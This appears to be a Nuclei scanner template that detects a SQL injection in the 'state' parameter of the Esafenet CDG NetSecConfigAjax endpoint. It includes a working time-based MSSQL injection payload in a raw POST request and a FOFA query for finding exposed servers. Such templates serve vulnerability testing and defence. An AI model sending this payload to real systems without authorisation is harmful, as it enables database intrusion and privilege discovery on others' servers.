id: esafenet-netsecconfigajax-sqli

info:
  name: Esafenet CDG NetSecConfigAjax - Sql Injection
  author: adeljck
  severity: high
  description: |
    The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
  classification:
    cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: esafenet
    product: cdg
    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
  tags: esafenet,sqli

http:
  - raw:
      - |
        POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"text/html")'
          - 'contains(body,"操作成功")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022013b40d9be2b6a1a7fc8d7f2064d5b7bcde2f53261b1bfead5c166a575297f76c022100fcb4832bb1586a23aec4de5e23c5b254ffaea84388de61a76485a0905c1a0eb1:922c64590222798bb761d5b6d8e72950